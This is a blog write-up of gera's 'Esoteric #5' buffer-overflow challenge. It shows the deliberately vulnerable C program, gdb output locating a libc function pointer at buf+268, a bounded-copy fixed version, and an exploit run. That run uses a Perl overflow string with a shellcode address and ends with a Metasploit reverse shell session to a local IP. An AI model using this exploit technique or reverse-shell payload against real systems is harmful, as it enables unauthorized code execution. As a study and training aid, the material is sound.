Thursday, December 27, 2012

Esoteric #5

gera's Esoteric #5. 

/* e5.c                                                      *
 * specially crafted to feed your brain by gera@core-sdi.com */

/* is this possible?                                         */

#include <stdio.h>   /* perror() */
#include <string.h>  /* strcpy() */

char buf[256];       /* global, so the overflow runs into whatever libc places after it */

/* gera deliberately swaps the usual names: argv is the count, argc the vector */
int main(int argv,char **argc) {
        strcpy(buf,argc[1]);   /* unbounded copy of the first argument into buf */
        perror(argc[2]);       /* perror() is what ends up calling through the clobbered pointer */
        while(1);
}


Needs to be compiled statically to get anywhere. buf is 256 bytes, but the useful target sits 268 bytes past its start, so it takes 268 bytes of filler plus four bytes of overwrite value to reach it.

(gdb) run `perl -e 'print "A" x 268 . "BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/dennis/es5/es5 `perl -e 'print "A" x 268 . "BBBB"'`

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) bt
#0  0x42424242 in ?? ()
#1  0x08048a1d in _IO_new_fdopen (fd=5, mode=0x80a2196 "w+") at iofdopen.c:121
#2  0x08048795 in perror (s=0x0) at perror.c:73
#3  0x0804820e in main (argv=2, argc=0xbffffa64) at es5.c:10
#4  0x080482fa in __libc_start_main (main=0x80481e0 <main>, argc=2,
    ubp_av=0xbffffa64, init=0x80480b4 <_init>, fini=0x8092620 <_fini>,
    rtld_fini=0, stack_end=0xbffffa5c) at ../sysdeps/generic/libc-start.c:129


At buf+268 is the same function pointer as in Esoteric #3 (__libc_internal_tsd_get in the static libc), this time reached via perror(), which calls through it from inside fdopen() as the backtrace shows.

(gdb) x/x buf+268
0x80a8d4c <__libc_internal_tsd_get>:    0x42424242
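The defect is the single unbounded strcpy() into a 256-byte global, which lets input spill into the libc data that follows buf. The program below is an added example, not gera's code, showing the same program with the copy bounded: a copy helper that refuses input that does not fit (including the terminator) instead of truncating silently, and an argument-count check so argc[1] is never NULL. The helper names (copy_bounded, try_run_of_as) and the 512-byte scratch limit are choices made here, not anything from the challenge.

```c
#define _POSIX_C_SOURCE 200809L   /* for strnlen() on glibc */
#include <stdio.h>
#include <string.h>
#include <errno.h>

/* Same buffer size as e5.c so the layout question is identical. */
#define BUF_SIZE 256
static char buf[BUF_SIZE];

/* Copy src into dst only if it fits, terminator included.
 * Returns 0 on success, -1 (leaving dst untouched) when src is too long
 * or an argument is missing. Refusing rather than truncating means an
 * over-long argument never touches the bytes after the buffer. */
int copy_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t n;
    if (dst == NULL || src == NULL || dstsz == 0)
        return -1;
    n = strnlen(src, dstsz);   /* never scans past dstsz bytes */
    if (n == dstsz)            /* no room left for the NUL */
        return -1;
    memcpy(dst, src, n + 1);   /* n + 1 <= dstsz, so this stays in bounds */
    return 0;
}

/* Helper for checking the boundary: builds a run of n 'A's (like the
 * perl "A" x N used above) in a scratch area and tries to copy it into buf.
 * Returns copy_bounded()'s result; n is capped at 511 by the scratch size. */
int try_run_of_as(size_t n)
{
    static char scratch[512];
    if (n >= sizeof scratch)
        return -1;
    memset(scratch, 'A', n);
    scratch[n] = '\0';
    return copy_bounded(buf, sizeof buf, scratch);
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <string> [perror-prefix]\n", argv[0]);
        return 2;
    }
    if (copy_bounded(buf, sizeof buf, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %zu bytes)\n", sizeof buf - 1);
        return 1;
    }
    /* perror(NULL) is legal, so a missing second argument needs no special case. */
    errno = 0;
    perror(argc > 2 ? argv[2] : NULL);
    return 0;
}
```

With this version a 268-byte argument is rejected before anything is written, and a 255-byte one is the longest that is accepted; the 256th byte would be the terminator, which is exactly where the original strcpy() started writing past the end.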


Exploit. 

[dennis@localhost es5]$ export ES5=`perl sc.pl`
[dennis@localhost es5]$ gcc -o ev5 ev5.c
[dennis@localhost es5]$ ./ev5
ES5 is at 0xbffffc28
[dennis@localhost es5]$ ./es5 `perl -e 'print "A" x 268 . "\x28\xfc\xff\xbf"'`

msf  exploit(handler) > exploit

[*] Started reverse handler on 192.168.0.4:4444
[*] Starting the payload handler...
[*] Sending stage (36 bytes) to 192.168.0.32
[*] Command shell session 2 opened (192.168.0.4:4444 -> 192.168.0.32:49773) at 2012-12-27 14:58:46 -0600

id
uid=500(dennis) gid=500(dennis) groups=500(dennis)
pwd
/home/dennis/es5
